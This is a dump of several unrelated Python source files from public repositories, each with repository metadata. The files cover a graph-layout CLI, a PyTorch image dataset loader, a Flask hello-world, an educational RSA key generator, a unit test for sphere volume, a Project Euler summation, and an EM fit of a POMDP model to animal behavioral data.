# Temperatura inicial
parser.add_argument(
'--t',
type=float,
help='Temperatura inicial',
default=100.0
)
# Archivo del cual leer el grafo
parser.add_argument(
'file_name',
help='Archivo del cual leer el grafo a dibujar'
)
# Gravedad
parser.add_argument(
'--g',
type=float,
help='Gravedad',
default=0.1
)
# c1
parser.add_argument(
'--c1',
type=float,
help='Atraccion',
default=1.0
)
# c2
parser.add_argument(
'--c2',
type=float,
help='Repulsion',
default=2.5
)
# Refresh
parser.add_argument(
'--refresh',
type=int,
help='Cantidad de iteraciones a realizar antes de graficar',
default=5
)
# Optimize
parser.add_argument(
'-o' , '--optimize',
action='store_true',
help='Optimiza el algoritmo.',
)
args = parser.parse_args()
graph = read_file_graph(args.file_name)
# Creamos nuestro objeto LayoutGraph
layout_gr = LayoutGraph(
graph,
iters=args.iters,
g = args.g,
t = args.t,
refresh=args.refresh,
c1 = args.c1,
c2 = args.c2,
verbose=args.verbose,
optimize=args.optimize
)
# Ejecutamos el layout
if(args.optimize):
layout_gr.layout_op()
else:
layout_gr.layout()
return
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | noreply@github.com |
8011342288f7791808e51d9093256729947985ed | 91a6a9891312142e172c44d13cc5f3ea14b76bd1 | /loader/IDDALoaderNew.py | ac2343501de511d06260a47900a1edac77db2b91 | [] | no_license | akhilgakhar/tSNE_ResNet | b79cca9696121c1f28fd7b6c867044c59faf7a34 | eb0ddea4d77297d41a3ba1d39b5b1067cf99827b | refs/heads/master | 2022-09-07T08:29:44.893538 | 2020-06-01T10:36:44 | 2020-06-01T10:36:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,342 | py | import os
import os.path as osp
import numpy as np
import random
import matplotlib.pyplot as plt
import collections
import torch
import torchvision
from torch.utils import data
from PIL import Image, ImageFile
from .augmentations import *
import imageio
ImageFile.LOAD_TRUNCATED_IMAGES = True
IDDA_DEFAULT_LABEL = 0
class IDDALoaderNew(data.Dataset):
def __init__(self, root, splitting_dir, label=1, max_samples=1000, transform=None, set='train', merge_classes=False):
self.root = root #"/media/tavera/vandal-hd1/IDDA"
self.label = label
self.transform = transform
self.splitting_dirs = splitting_dir
self.files = []
self.img_ids =[]
self.set = set
self.max_images = max_samples #500
for idx, image_id in enumerate(open(self.splitting_dirs)):
self.img_ids += [image_id.strip()]
if idx == self.max_images - 1:
break
print("LEN IMAGES: ")
print(len(self.img_ids))
#print(self.img_ids)
added = 0
# for split in ["train", "trainval", "val"]:
for name in self.img_ids:
if added==0: # < max_samples/2:
img_file = osp.join(self.root, "RGB", name)
else:
img_file = osp.join(self.root, "SemanticRGB", name)
self.files.append({
"img": img_file,
"label": self.label,
"name": name
})
added += 1
# print(self.files)
def get_label_from_image(self, image_id):
for i, scenario in enumerate(self.label_dict):
if scenario in image_id:
return i
def __len__(self):
return len(self.files)
def __getitem__(self, index):
datafiles = self.files[index]
#print(datafiles["img"])
try:
image = Image.open(datafiles["img"]).convert('RGB')
new_width = 1080 #720
new_height = 1920 #1280
image = image.resize((new_width, new_height), Image.ANTIALIAS)
# print(image.size)
except:
print("Error")
label = datafiles["label"]
name = datafiles["name"]
if self.transform is not None:
#print("transforming")
image_new = self.transform(image)
# print(image.size)
return image_new, label, name
if __name__ == '__main__':
dst = GTA5DataSet("./data", is_transform=True)
trainloader = data.DataLoader(dst, batch_size=4)
for i, data in enumerate(trainloader):
imgs, labels = data
if i == 0:
img = torchvision.utils.make_grid(imgs).numpy()
img = np.transpose(img, (1, 2, 0))
img = img[:, :, ::-1]
plt.imshow(img)
plt.show()
| [
"taveraantonio@icloud.com"
] | taveraantonio@icloud.com |
996a203774c48220ada4a1b9bfb99c0225c52bba | abff9601abdd9a326339a58a1d8f08db9d091963 | /hello.py | f4a194b1573b39e7347474c6d3043df9d8d76ac2 | [] | no_license | mvgolom/test-flask | a9d6cdeee9d149952c367ee5aa2cc7b95f351fc0 | 8f789f5340c8374c1ee11b312c7098dc88c63fbb | refs/heads/master | 2021-01-21T20:42:33.955116 | 2017-05-24T09:13:44 | 2017-05-24T09:13:44 | 92,269,128 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | from flask import Flask
app = Flask(__name__)
#golom
@app.route("/")
def hello():
return "Hello World!"
if __name__ == "__main__":
app.run() | [
"viniciusgolom@gmail.com"
] | viniciusgolom@gmail.com |
143eab90e1c7f37888f668b3c97386d68781e1ff | 81669e40a61e137f3fd13039c912b0594b530b69 | /HW4/B10532011_高靖雅/Rsa_generate.py | af6c43343a6ad675c96e69b593892b7816a0c739 | [] | no_license | hsingpingwang/Information_Security_Class | 7143e42d140deac2f6616db1d281c7fb76e598f6 | f952fe070aae0f7f4a7775a784cf12fc4237df9c | refs/heads/master | 2020-08-02T21:53:37.721791 | 2020-01-02T14:55:12 | 2020-01-02T14:55:12 | 211,517,550 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,308 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 10 23:19:51 2019
@author: chinya
"""
import random, math, sys
"""
參數: 正整數x 整數指數k optional modulus p
計算: x^k 或是 x^k mod p (p存在時)
"""
def square_and_multiply(x, k, p=None):
b = bin(k).lstrip('0b')
r = 1
for i in b:
r = r**2
if i == '1':
r = r * x
if p:
r %= p
return r
def miller_rabin_primality_test(p, s=5):
# 2 是唯一的偶數且質數
if p == 2:
return True
# 若n是除了2外的偶數,則非質數
if not (p & 1):
return False
# p-1 = 2^u * r
p1 = p - 1
u = 0
r = p1
while r % 2 == 0:
r >>= 1
u += 1
# 若此時 p-1 = 2^u * r holds
assert p-1 == 2**u * r
def witness(a):
# True, 表此時有witness證明p不是質數
# False, 表此時p可能是質數
#用square and multiply 加速計算
z = square_and_multiply(a, r, p)
if z == 1:
return False
for i in range(u):
z = square_and_multiply(a, 2**i * r, p)
if z == p1:
return False
return True
for j in range(s):
a = random.randrange(2, p-2)
if witness(a):
return False
return True
"""
以bitlength n來產生質數,直到產生k個質數後結束
質數測試的數字從隨機開始,測試是用整數
"""
def generate_primes(n=512, k=1):
assert k > 0
assert n > 0 and n < 4096
# follows from the prime number theorem
necessary_steps = math.floor( math.log(2**n) / 2 )
# get n random bits as our first number to test for primality
x = random.getrandbits(n)
primes = []
while k>0:
#呼叫miller rabin test 來測試是否為質數
if miller_rabin_primality_test(x, s=7):
primes.append(x)
k = k-1
x = x+1
return primes
"""
擴展歐幾里得演算法Extended Euclidean Algorithm(EEA)
參數: 正整數a,b 且 a > b
計算: gcd(a,b) = s*a + t*b
Return: ( gcd(a,b), s, t )
參考: https://en.wikibooks.org/wiki/Algorithm_Implementation/Mathematics/Extended_Euclidean_algorithm
"""
def EEA(a, b):
assert a > b, 'a must be larger than b'
x0, x1, y0, y1 = 1, 0, 0, 1
while a != 0:
q, b, a = b // a, a, b % a
x0, x1 = x1, x0 - q * x1
y0, y1 = y1, y0 - q * y1
return b, y0, x0
# 當指令直接呼叫Rsa_generate.py時執行main
def main():
#從指令得指定的bits大小
cmd_list = sys.argv[1:]
bits = int(cmd_list[0])
#以bits大小來給定pq值
p = generate_primes(n=bits, k=1)[0]
q = generate_primes(n=bits, k=1)[0]
#計算n和phi_n
n = p * q
phi_n = (p - 1) * (q - 1)
#隨機找e且與phi_n-1互值並計算d
while True:
e = random.randrange(1, phi_n-1)
if math.gcd(e, phi_n) == 1:
#計算d: 利用擴展歐幾里得算法找e的反元素
gcd, s, t = EEA(phi_n, e)
if gcd == (s*phi_n + t*e):
d = t % phi_n
break
print('\np= ',p)
print('\nq= ',q)
print('\nn= ',n)
print('\ne= ',e)
print('\nd= ',d)
if __name__ == '__main__':
main() | [
"smallrespect33@gmail.com"
] | smallrespect33@gmail.com |
2d8e282e4ff5217cf1139f3a412e41342844571a | 278a000f8b40476b5d1473cc1b98d5872551cab2 | /test_sphere_volume.py | cb30c89536569a7350adecec0fb65901984d43cd | [] | no_license | Kaliumerbol/kaliev_erbol_hw_2.6 | 172eb765a9cd5be8f8a9dc4f28e3fc258e5d92d9 | 5ea5fa98baf10d467a287da435f40e796c2594c3 | refs/heads/main | 2023-06-05T15:44:51.723761 | 2021-06-29T10:51:01 | 2021-06-29T10:51:01 | 381,329,097 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 981 | py | import unittest
import math
from sphere_volume import calculate_sphere_volume
pi = math.pi
class TestSphereVolume(unittest.TestCase):
def test_area(self):
self.assertAlmostEqual(calculate_sphere_volume(5), 4/3*pi*5**3)
self.assertAlmostEqual(calculate_sphere_volume(3.7), 4/3*pi*3.7**3)
self.assertAlmostEqual(calculate_sphere_volume(1), 4/3*pi)
# толком не понял как работает АсертРейсес, в нете долго копалсяя но внятного объяснения нет. что и как вылавливать не понятно, значения не описаны. Поэтому закоментил. А так все работает норм.
# self.assertRaises(ValueError, calculate_sphere, 'four')
def test_negative(self):
self.assertEqual(calculate_sphere_volume(-5), 'Радиус сферы не может быть отрицательным')
unittest.main() | [
"you@example.com"
] | you@example.com |
dbc3109026886a765f36a35503e96aecea7ce691 | 6dd9c1861878c3d2b173465f690a156c141dcfe9 | /Problem13.py | af15f94f1f7e8c46845bafa78862fd49c24ea873 | [] | no_license | MGasiewski/Euler | d57bf33a5f22ff7ee0d626da561259e69d2c9437 | 7bb922545d6c32b2dc203637b7c496e73f4460c0 | refs/heads/master | 2021-05-05T02:29:51.184887 | 2018-02-01T03:15:00 | 2018-02-01T03:15:00 | 119,776,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,230 | py | number_string = '''37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690'''
number_lines = number_string.splitlines()
numbers = [int(x[:11]) for x in number_lines]
print(sum(numbers)) | [
"mattgasiewski@outlook.com"
] | mattgasiewski@outlook.com |
40e3e58fd9f5481541e28e7409d81d114f2d8598 | 783f4a386cc2e1dd434642835d5fe0ea8d21c305 | /neural_data_analysis.py | 67e37ddaf4e923097d553bfc34ef8a1d79a2892e | [] | no_license | wenshuowang/inverse-POMDP | 83b21af10e3f276715646c14ec1853bdebdd7ef4 | 596709441a80b9f4685b1b575cd6a5d89eee04c6 | refs/heads/master | 2022-12-22T03:26:57.467651 | 2020-09-27T04:45:23 | 2020-09-27T04:45:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,250 | py | from scipy.io import loadmat
import numpy as np
import matplotlib.pyplot as plt
import hdf5storage
from twobox import *
from HMMtwobox import *
import pickle
from datetime import datetime
import os
from pprint import pprint
# Working directory and a wall-clock stamp; both are used below to build
# the file names of the pickled EM results.
path = os.getcwd()
datestring = datetime.now().strftime('%m%d%Y(%H%M)')
###########################################################
#
# Pre-process data
#
###########################################################
# Load the behavioral recording and clean the animal's x-position trace.
data = loadmat('NeuralDatafromNeda/behavior74.mat')
location = np.copy(data['bLocX74'][0])
# fill nan with the average of the previous and the next
nanind = np.where(np.isnan(location))[0]
location[nanind] = (location[nanind - 1] + location[nanind + 1]) / 2
# there might be two adjacent nans: a NaN next to another NaN survives the
# first pass (its neighbor average is still NaN), so patch again in pairs.
# NOTE(review): pairing the remaining NaN indices [::2]/[1::2] assumes they
# occur strictly as adjacent pairs (even count) -- confirm against raw data.
nanind1 = np.where(np.isnan(location))[0][::2]
nanind2 = np.where(np.isnan(location))[0][1::2]
location[nanind1] = (location[nanind1 - 1] + location[nanind1 + 2]) / 2
location[nanind2] = location[nanind1]
def movingaverage(interval, window_size):
    """Smooth *interval* with a centered boxcar filter of width *window_size*.

    Returns an array the same length as the input ('same' convolution),
    so the first/last few samples are edge-attenuated.
    """
    width = int(window_size)
    kernel = np.full(width, 1.0 / float(window_size))
    return np.convolve(interval, kernel, 'same')
# smoothing the location
location = movingaverage(location, 5)
# adjust the value of the outliers: quantize x-position into three sites.
# Order matters: values written as 1 or 2 fall outside [350, 450], so the
# final mask cannot overwrite them.
# NOTE(review): 350/450 look like pixel thresholds separating box 1 / center
# corridor / box 2 -- confirm against the tracking setup.
location[np.where(location < 350)[0]] = 1
location[np.where(location > 450)[0]] = 2
location[np.all([location >= 350, location <= 450], axis=0)] = 0
# Movement-action codes (0 elsewhere means "no go action at this time bin").
g0 = 1 # g0 = go to location 0
g1 = 2 # g1 = go toward box 1 (via location 0 if from 2)
g2 = 3 # g2 = go toward box 2 (via location 0 if from 1)
# Time bins at which the discretized location changes on the next step.
loc_change_ind = np.where((location[0:-1] - location[1:])!= 0)[0]
goaction = np.zeros(len(location))
# Label each location transition with the corresponding go action.
for i in range(len(loc_change_ind)):
    if location[loc_change_ind[i]] == 0: # at center location
        if location[loc_change_ind[i] + 1] == 1: # go towards box 1
            goaction[loc_change_ind[i]] = g1
        else: # go towards box 2
            goaction[loc_change_ind[i]] = g2
    elif location[loc_change_ind[i]] == 1: # at box1
        if location[loc_change_ind[i] + 1] == 0: # go towards box 0
            goaction[loc_change_ind[i]] = g0
        else: # go towards box 2
            goaction[loc_change_ind[i]] = g2
    else: # at box2
        if location[loc_change_ind[i] + 1] == 0: # go towards box 0
            goaction[loc_change_ind[i]] = g0
        else: # go towards box 1
            goaction[loc_change_ind[i]] = g1
# Button-push and reward-delivery event times, converted to time-bin indices.
# NOTE(review): // 200 presumably converts raw timestamps into the same
# 200-unit bins as the location trace -- confirm the sampling rate.
b1Pushed = data['b1PushedTimes74'][0] // 200
b2Pushed = data['b2PushedTimes74'][0] // 200
rew1Del = data['rew1DelTimes74'][0] // 200
rew2Del = data['rew2DelTimes74'][0] // 200
# Action code for pressing either button; overrides any go action in that bin.
pb = 4
action = np.copy(goaction)
for i in range(len(b1Pushed)):
    action[b1Pushed[i]] = pb
for i in range(len(b2Pushed)):
    action[b2Pushed[i]] = pb
# Binary reward-delivery indicator per time bin (either box).
rewardDel = np.zeros(len(location))
for i in range(len(rew1Del)):
    rewardDel[rew1Del[i]] = 1
for i in range(len(rew2Del)):
    rewardDel[rew2Del[i]] = 1
# Keep only the first T bins and cast to the integer codes used by the HMM.
T = 15000
loc = location[0:T].astype(int)
act = action[0:T].astype(int)
rew = rewardDel[0:T].astype(int)
#######################
# add=hoc modification of the data
#######################
# Hand-tuned corrections: shift a few reward-delivery flags by one time bin
# and drop some spurious ones.  Presumably this realigns rewards with the
# immediately preceding button push after the integer binning above --
# TODO confirm each index against the raw event times.
rew[1224] = 0
rew[1225] = 1
rew[2445] = 0
rew[2446] = 1
rew[3852] = 0
rew[3853] = 1
rew[3384] = 0
rew[11538] = 1
rew[11539] = 0
rew[12620] = 0
rew[13729] = 1
rew[13730] = 0
rew[13731] = 0
#######################
###########################################################
#
# EM algorithm
#
###########################################################
# Stack the observation channels into shape (1, T, 3): columns are
# (action, reward, location); the leading axis indexes data sets.
obsN = np.dstack([act, rew, loc])
obs = obsN[0]
E_MAX_ITER = 500 # 100 # maximum number of iterations of E-step
GD_THRESHOLD = 10 #0.5 # 0.01 # stopping criteria of M-step (gradient descent)
E_EPS = 0.5 # stopping criteria of E-step
#M_LR_INI = float(sys.argv[1])
M_LR_INI = 1 * 10 ** -6 # initial learning rate in the gradient descent step
LR_DEC = 4 # number of times that the learning rate can be reduced
SaveEvery = 50 # checkpoint the EM trajectories every this many E-iterations
# No need to manual interaction to specify parameters in the command line
#parameters = [gamma1, gamma2, epsilon1, epsilon2, groom, travelCost, pushButtonCost]
# Record of all run settings, pickled alongside the results for provenance.
parameterMain_dict = {'E_MAX_ITER': E_MAX_ITER,
                      'GD_THRESHOLD': GD_THRESHOLD,
                      'E_EPS': E_EPS,
                      'M_LR_INI': M_LR_INI,
                      'LR_DEC': LR_DEC,
                      'SaveEvery': SaveEvery,
                      'ParaInitial': [np.array([0.2, 0.25, 0, 0, 0.2, 0.3, 0.5])]
                      # 'ParaInitial': [np.array(list(map(float, i.strip('[]').split(',')))) for i in sys.argv[3].strip('()').split('-')]
                      # Initial parameter is a set that contains arrays of parameters, here only consider one initial point
                      }
output1 = open(path + '/' + datestring + '_real_ParameterMain_twobox' + '.pkl', 'wb')
pickle.dump(parameterMain_dict, output1)
output1.close()
### Choose which sample is used for inference
sampleIndex = [0]
NN = len(sampleIndex)
### Set initial parameter point
parameters_iniSet = parameterMain_dict['ParaInitial']
# MDP/HMM dimensions: discount factor, belief bins (nq), reward states (nr),
# locations (nl), actions (na).
discount = 0.99
nq = 5
nr = 2
nl = 3
na = 5
print("\nThe initial points for estimation are:", parameters_iniSet)
#### EM algorithm for parameter estimation
print("\nEM algorithm begins ...")
# NN denotes multiple data set, and MM denotes multiple initial points
# NN_MM_para_old_traj = []
# NN_MM_para_new_traj = []
# NN_MM_log_likelihoods_old = []
# NN_MM_log_likelihoods_new = []
# NN_MM_log_likelihoods_com_old = [] # old posterior, old parameters
# NN_MM_log_likelihoods_com_new = [] # old posterior, new parameters
# NN_MM_latent_entropies = []
# EM-style fitting: outer loop over data sets (NN), inner loop over initial
# parameter points (MM).  Each E-step computes the latent posterior and the
# log-likelihood under the current parameters; each M(G)-step improves the
# expected complete-data log-likelihood (ECDLL) by gradient ascent.
for nn in range(NN):
    print("\nFor the", sampleIndex[nn] + 1, "-th set of data:")
    ##############################################################
    # Compute likelihood
    obs = obsN[sampleIndex[nn], :, :]
    MM = len(parameters_iniSet)
    # MM_para_old_traj = []
    # MM_para_new_traj = []
    # MM_log_likelihoods_old = []
    # MM_log_likelihoods_new = []
    # MM_log_likelihoods_com_old = [] # old posterior, old parameters
    # MM_log_likelihoods_com_new = [] # old posterior, new parameters
    # MM_latent_entropies = []
    for mm in range(MM):
        parameters_old = np.copy(parameters_iniSet[mm])
        print("\n######################################################\n",
              mm + 1, "-th initial estimation:", parameters_old)
        # NOTE: itermax is set but the loop below stops only on convergence.
        itermax = E_MAX_ITER #100 # iteration number for the EM algorithm
        eps = E_EPS # Stopping criteria for E-step in EM algorithm
        # Per-initial-point trajectories of parameters and likelihoods.
        para_old_traj = []
        para_new_traj = []
        log_likelihoods_old = []
        log_likelihoods_new = []
        log_likelihoods_com_old = [] # old posterior, old parameters
        log_likelihoods_com_new = [] # old posterior, new parameters
        latent_entropies = []
        count_E = 0
        # Alternate E- and M-steps until the observed-data log-likelihood
        # changes by less than eps between consecutive E-steps.
        while True:
            print("The", count_E + 1, "-th iteration of the EM(G) algorithm")
            if count_E == 0:
                parameters_old = np.copy(parameters_iniSet[mm])
            else:
                parameters_old = np.copy(parameters_new) # update parameters
            para_old_traj.append(parameters_old)
            ########## E-step ##########
            ## Use old parameters to estimate posterior
            #twoboxGra = twoboxMDPder(discount, nq, nr, na, nl, parameters_old, vinitial)
            twoboxGra = twoboxMDPder(discount, nq, nr, na, nl, parameters_old)
            ThA_old = twoboxGra.ThA
            softpolicy_old = twoboxGra.softpolicy
            # Uniform initial belief over the nq x nq joint belief states.
            pi = np.ones(nq * nq) / nq / nq
            twoHMM = HMMtwobox(ThA_old, softpolicy_old, pi)
            ## Calculate likelihood of observed and complete date, and entropy of the latent sequence
            # Observed-data log-likelihood = ECDLL + entropy of latent posterior.
            complete_likelihood_old = twoHMM.computeQaux(obs, ThA_old, softpolicy_old)
            latent_entropy = twoHMM.latent_entr(obs)
            log_likelihood = complete_likelihood_old + latent_entropy
            log_likelihoods_com_old.append(complete_likelihood_old)
            latent_entropies.append(latent_entropy)
            log_likelihoods_old.append(log_likelihood)
            print(parameters_old)
            print(complete_likelihood_old)
            print(log_likelihood)
            ## Check convergence
            if len(log_likelihoods_old) >= 2 and np.abs(log_likelihood - log_likelihoods_old[-2]) < eps:
                print("EM has converged!")
                break
            ########## M(G)-step ##########
            M_thresh = GD_THRESHOLD
            count_M = 0
            # NOTE: vinitial is unused by the active (dQauxdpara_sim) code path.
            vinitial = 0
            para_new_traj.append([])
            log_likelihoods_com_new.append([])
            log_likelihoods_new.append([])
            # Learning rate decays every 20 E-iterations, then is halved
            # within the M-step whenever a gradient step fails to improve.
            learnrate_ini = M_LR_INI * np.exp(- count_E // 20)
            learnrate = learnrate_ini
            # Start the gradient descent from the old parameters
            parameters_new = np.copy(parameters_old)
            complete_likelihood_new = complete_likelihood_old
            log_likelihood = complete_likelihood_new + latent_entropy
            para_new_traj[count_E].append(parameters_new)
            log_likelihoods_com_new[count_E].append(complete_likelihood_new)
            log_likelihoods_new[count_E].append(log_likelihood)
            print("\nM-step")
            print(parameters_new)
            print(complete_likelihood_new)
            print(log_likelihood)
            while True:
                # derivative_value = twoboxGra.dQauxdpara(obs, parameters_new, vinitial)
                # # vinitial is value from previous iteration, this is for computational efficiency
                # para_temp = parameters_new + learnrate * np.array(derivative_value[:-1])
                # vinitial = derivative_value[-1] # value iteration starts with value from previous iteration
                derivative_value = twoboxGra.dQauxdpara_sim(obs, parameters_new)
                # vinitial is value from previous iteration, this is for computational efficiency
                para_temp = parameters_new + learnrate * np.array(derivative_value)
                ## Check the ECDLL (old posterior, new parameters)
                twobox_new = twoboxMDP(discount, nq, nr, na, nl, para_temp)
                twobox_new.setupMDP()
                twobox_new.solveMDP_sfm()
                ThA_new = twobox_new.ThA
                softpolicy_new = twobox_new.softpolicy
                complete_likelihood_new_temp = twoHMM.computeQaux(obs, ThA_new, softpolicy_new)
                print(" ", para_temp)
                print(" ", complete_likelihood_new_temp)
                ## Update the parameter if the ECDLL can be improved
                # Accept the step only if it improves the ECDLL by at least
                # M_thresh; otherwise halve the learning rate and retry,
                # giving up after LR_DEC halvings.
                if complete_likelihood_new_temp > complete_likelihood_new + M_thresh:
                    parameters_new = np.copy(para_temp)
                    complete_likelihood_new = complete_likelihood_new_temp
                    log_likelihood = complete_likelihood_new + latent_entropy
                    para_new_traj[count_E].append(parameters_new)
                    log_likelihoods_com_new[count_E].append(complete_likelihood_new)
                    log_likelihoods_new[count_E].append(log_likelihood)
                    print('\n', parameters_new)
                    print(complete_likelihood_new)
                    print(log_likelihood)
                    count_M += 1
                else:
                    learnrate /= 2
                    if learnrate < learnrate_ini / (2 ** LR_DEC):
                        break
            # every 50 iterations, download data
            # Periodic checkpoint of all trajectories so a long run can be
            # inspected (or resumed from its pickles) before it finishes.
            if (count_E + 1) % SaveEvery == 0:
                Experiment_dict = {'ParameterTrajectory_Estep': para_old_traj,
                                   'ParameterTrajectory_Mstep': para_new_traj,
                                   'LogLikelihood_Estep': log_likelihoods_old,
                                   'LogLikelihood_Mstep': log_likelihoods_new,
                                   'Complete_LogLikelihood_Estep': log_likelihoods_com_old,
                                   'Complete_LogLikelihood_Mstep': log_likelihoods_com_new,
                                   'Latent_entropies': latent_entropies
                                   }
                output = open(path + '/' + datestring + '_' + str(count_E + 1) + '_real_EM_twobox' + '.pkl', 'wb')
                pickle.dump(Experiment_dict, output)
                output.close()
            count_E += 1
        # save the remainings
        Experiment_dict = {'ParameterTrajectory_Estep': para_old_traj,
                           'ParameterTrajectory_Mstep': para_new_traj,
                           'LogLikelihood_Estep': log_likelihoods_old,
                           'LogLikelihood_Mstep': log_likelihoods_new,
                           'Complete_LogLikelihood_Estep': log_likelihoods_com_old,
                           'Complete_LogLikelihood_Mstep': log_likelihoods_com_new,
                           'Latent_entropies': latent_entropies
                           }
        output = open(path + '/' + datestring + '_' + str(count_E + 1) + '_real_EM_twobox' + '.pkl', 'wb')
        pickle.dump(Experiment_dict, output)
        output.close()
# MM_para_old_traj.append(para_old_traj) # parameter trajectories for a particular set of data
# MM_para_new_traj.append(para_new_traj)
# MM_log_likelihoods_old.append(log_likelihoods_old) # likelihood trajectories for a particular set of data
# MM_log_likelihoods_new.append(log_likelihoods_new)
# MM_log_likelihoods_com_old.append(log_likelihoods_com_old) # old posterior, old parameters
# MM_log_likelihoods_com_new.append(log_likelihoods_com_new) # old posterior, new parameters
# MM_latent_entropies.append(latent_entropies)
#
# NN_MM_para_old_traj.append(MM_para_old_traj) # parameter trajectories for all data
# NN_MM_para_new_traj.append(MM_para_new_traj)
# NN_MM_log_likelihoods_old.append(MM_log_likelihoods_old) # likelihood trajectories for
# NN_MM_log_likelihoods_new.append(MM_log_likelihoods_new)
# NN_MM_log_likelihoods_com_old.append(MM_log_likelihoods_com_old) # old posterior, old parameters
# NN_MM_log_likelihoods_com_new.append(MM_log_likelihoods_com_new) # old posterior, new parameters
# NN_MM_latent_entropies.append(MM_latent_entropies)
###########################################################
#
# save data
#
###########################################################
# ## save the running data
# Experiment_dict = {'ParameterTrajectory_Estep': NN_MM_para_old_traj,
# 'ParameterTrajectory_Mstep': NN_MM_para_new_traj,
# 'LogLikelihood_Estep': NN_MM_log_likelihoods_old,
# 'LogLikelihood_Mstep': NN_MM_log_likelihoods_new,
# 'Complete_LogLikelihood_Estep': NN_MM_log_likelihoods_com_old,
# 'Complete_LogLikelihood_Mstep': NN_MM_log_likelihoods_com_new,
# 'Latent_entropies': NN_MM_latent_entropies
# }
# output = open(path + '/' + datestring + '_real_EM_twobox' + '.pkl', 'wb')
# pickle.dump(Experiment_dict, output)
# output.close()
#
# ## save running parameters
# # parameterMain_dict = {'E_MAX_ITER': E_MAX_ITER,
# # 'GD_THRESHOLD': GD_THRESHOLD,
# # 'E_EPS': E_EPS,
# # 'M_LR_INI': M_LR_INI,
# # 'LR_DEC': LR_DEC,
# # 'ParaInitial': parameters_iniSet}
# output1 = open(path + '/' + datestring + '_real_ParameterMain_twobox' + '.pkl', 'wb')
# pickle.dump(parameterMain_dict, output1)
# output1.close()
# Signal that the EM fitting script ran to completion.
print("finish")
# ###########################################################
# #
# # retrieve data and look into contour
# #
# ###########################################################
# EM_pkl_file = open(path + '/real_EM_twobox.pkl', 'rb')
# EM_pkl = pickle.load(EM_pkl_file)
# EM_pkl_file.close()
#
# ParameterMain_pkl_file = open(path + '/real_ParameterMain_twobox.pkl', 'rb')
# ParameterMain_pkl = pickle.load(ParameterMain_pkl_file)
# ParameterMain_pkl_file.close()
#
# NN_MM_para_old_traj = EM_pkl['ParameterTrajectory_Estep']
# NN_MM_para_new_traj = EM_pkl['ParameterTrajectory_Mstep']
# NN_MM_log_likelihoods_old = EM_pkl['LogLikelihood_Estep']
# NN_MM_log_likelihoods_new = EM_pkl['LogLikelihood_Mstep']
# NN_MM_log_likelihoods_com_old = EM_pkl['Complete_LogLikelihood_Estep']
# NN_MM_log_likelihoods_com_new = EM_pkl['Complete_LogLikelihood_Mstep']
# NN_MM_latent_entropies = EM_pkl['Latent_entropies']
#
